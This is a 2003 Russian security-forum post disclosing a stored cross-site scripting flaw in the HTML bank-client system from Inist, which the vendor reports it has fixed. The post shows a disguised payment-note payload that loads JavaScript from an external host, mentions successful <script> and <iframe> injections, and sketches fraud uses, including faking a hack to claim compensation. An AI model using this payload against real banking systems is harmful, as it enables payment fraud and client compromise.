информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
За кого нас держат?Атака на InternetSpanning Tree Protocol: недокументированное применение
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 The Great Suspender предположительно... 
 Десятилетняя уязвимость в sudo 
 Блокировка Flash поломала китайскую... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Ошибка в банк-клиенте от Инист 26.01.03 14:05  
Автор: Komlin Статус: Незарегистрированный пользователь
Отредактировано 27.01.03 12:30  Количество правок: 3
<"чистая" ссылка>
Сейчас всё большую популярность приобретают Банк - Клиенты построенные по HTML технологии.

Действительно, у HTML много преимуществ особенно для пользователя и для банка в первую очередь лёгкость модернизации.

К сожалению эти системы с точки зрения безопасности являются наследниками многих болезней HTML сиcтем.

Фактически такой банк-клиент частный случай транспортной WEB системы , где в роли сообщения выступает поле примечания платёжки. Думаю, некоторые из присутствующих помнят как взламывались практически 100 % почтовых систем и форумов.

http://www.hackzone.ru/articles/testmail.html

Поэтому мне пришла в голову простая мысль: а что если в платёжку, в поле примечание, попытаться включить старую добрую теговую атаку, слегка замаскировав её, и отослать такую платёжку пользователю HTML-вского банк клиента

Например (взлом клиета)
НДС 20% -X руб. Оплата по счёту # Y от zz.zz.zz за товар A индекс по Internet-каталогу :
<script src=http://magazin.narod.ru/ZAKAZ#222.js></script>

Если эта платёжка отправляется по банк-клиенту с крупного банка, то скорее всего она дойдёт атакуемого без изменений, поскольку бухгалтера-операционистки часто даже слова HTML не знают и врядли усомнятся, что это странный индекс товара (в платёжках и более странные формулировки встречаются). Им главное, чтобы НДС и номер счёта был.

Смысл атаки в том, что код из ZAKAZ22.js спокойно выполнится на машине у клиента в момент просмотра списка платёжек или самой платёжки

В этом коде может содержаться либо эксплойт для браузера ( новые ошибки в IE появляются с завидной регулярностью, кроме того никто из пользователей всё равно браузеры не патчит, поэтому наверняка сойдёт и старая), либо скрытый генератор формы идентичной платёжной на отсылку банку.

Возможен и др. вариант применения ошибки: имитация взлома по вине банк-клиента с целью получения компенсации от банкы


Цитата с форума bankir.ru
"Вот придёт к Вам мошенник c лицом честного клиента и скажет: "Вот, смотрите меня аттаковали три месяца назад(помните я звонил Вам насчёт платежа,а Вы сказали, что с подписью всё в порядке). Милиция и эксперты вот выянили, что это было. Вот копия присланной платёжки, вот следы взлома, вот код эксплойта который был применён, а похитителя увы не нашли..., вот справка обокончании предварительного следствия.
Эксперты считают, что и доля Вашей вины здесь есть, не примите ли на себя часть расходов, чтобы долго и бесполезно не судится?"

Атака № 1 проверялась на демо-версии популярноего банк -клиента Инист (входящего в тройку лидеров рынка) .
http://www.inist.ru/servlets/ibc

Туда были вставлены простые извещения вида <script>... </script> и <iframe src= и обе сработали, причём выданы после обработки сервером.

В настоящее время ошибка устранена производителем. Справеливости ради надо заметить, что в своём ответе последний заявил, что считает данную ошибку несуществнной.

Да, ошибка была. Исправили.
Можно ли было ею воспользоваться? Сомнительно.


К сожалению, он никак не аргументировал свою точку зрения.

Первоначальное сообщение об ошибке и его обсуждение Вы можете посмотреть по нижеприведённой ссылке

Ссылка
1






Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2021 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach